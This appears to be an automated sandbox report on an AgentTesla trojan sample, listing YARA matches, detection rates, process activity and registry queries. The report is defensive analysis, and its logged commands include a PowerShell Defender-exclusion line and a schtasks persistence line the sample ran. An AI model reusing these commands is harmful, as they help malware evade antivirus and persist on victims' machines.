                Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 0_2_0092C454
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 0_2_0092EA70
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 0_2_0092EA61
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_027CF100
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_027CF448
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_027C61A2
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_027CADD0
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05B4C940
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05B4BBF0
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05B41FF8
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05B40040
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E881C5
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E8AC48
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E857B8
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E8E728
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E844F8
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E8CFB0
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E85754
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E83330
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: String function: 05B45A58 appears 53 times
                Source: wKQpOZ58Gl.exe, 00000000.00000002.436014526.000000000074B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.468114283.000000000A9A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSchedulingClerk.dll. vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.437936842.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFroor.dll4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.442009787.0000000003C4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSchedulingClerk.dll. vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.453033607.0000000005470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePlates.dll4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.467471809.0000000006EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFroor.dll4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000003.398824217.0000000006A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000000.358515181.0000000000012000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConstructionRespo.exe@ vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 0000000E.00000000.432521984.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZqMmxdBZxDWFkkqtZOXlpMZbKL.exe4 vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.629086814.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exeBinary or memory string: OriginalFilenameConstructionRespo.exe@ vs wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: kqruryFrIFc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wKQpOZ58Gl.exeVirustotal: Detection: 57%
                Source: wKQpOZ58Gl.exeMetadefender: Detection: 25%
                Source: wKQpOZ58Gl.exeReversingLabs: Detection: 69%
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile read: C:\Users\user\Desktop\wKQpOZ58Gl.exeJump to behavior
                Source: wKQpOZ58Gl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe "C:\Users\user\Desktop\wKQpOZ58Gl.exe"
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Users\user\Desktop\wKQpOZ58Gl.exe C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile created: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeJump to behavior
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile created: C:\Users\user\AppData\Local\Temp\tmp92BC.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/9@2/2
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: wKQpOZ58Gl.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: wKQpOZ58Gl.exe, MaterialSurfaceExample/frmMain.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: kqruryFrIFc.exe.0.dr, MaterialSurfaceExample/frmMain.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 0.0.wKQpOZ58Gl.exe.10000.0.unpack, MaterialSurfaceExample/frmMain.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: wKQpOZ58Gl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: wKQpOZ58Gl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: wKQpOZ58Gl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: wKQpOZ58Gl.exe, MaterialSurfaceExample/frmMain.cs.Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: kqruryFrIFc.exe.0.dr, MaterialSurfaceExample/frmMain.cs.Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.wKQpOZ58Gl.exe.10000.0.unpack, MaterialSurfaceExample/frmMain.cs.Net Code: InnerException System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E82177 push edi; retn 0000h
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E82520 push edi; ret
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E81432 pushfd ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E80FFB push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E80F9B push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E81372 pushad ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E81328 push esp; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E8125F pushfd ; iretd
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeCode function: 14_2_05E81208 push esp; iretd
                Source: wKQpOZ58Gl.exeStatic PE information: 0xED6817C1 [Mon Mar 19 19:00:17 2096 UTC]
                Source: initial sampleStatic PE information: section name: .text entropy: 7.704114614834008
                Source: initial sampleStatic PE information: section name: .text entropy: 7.704114614834008
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile created: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
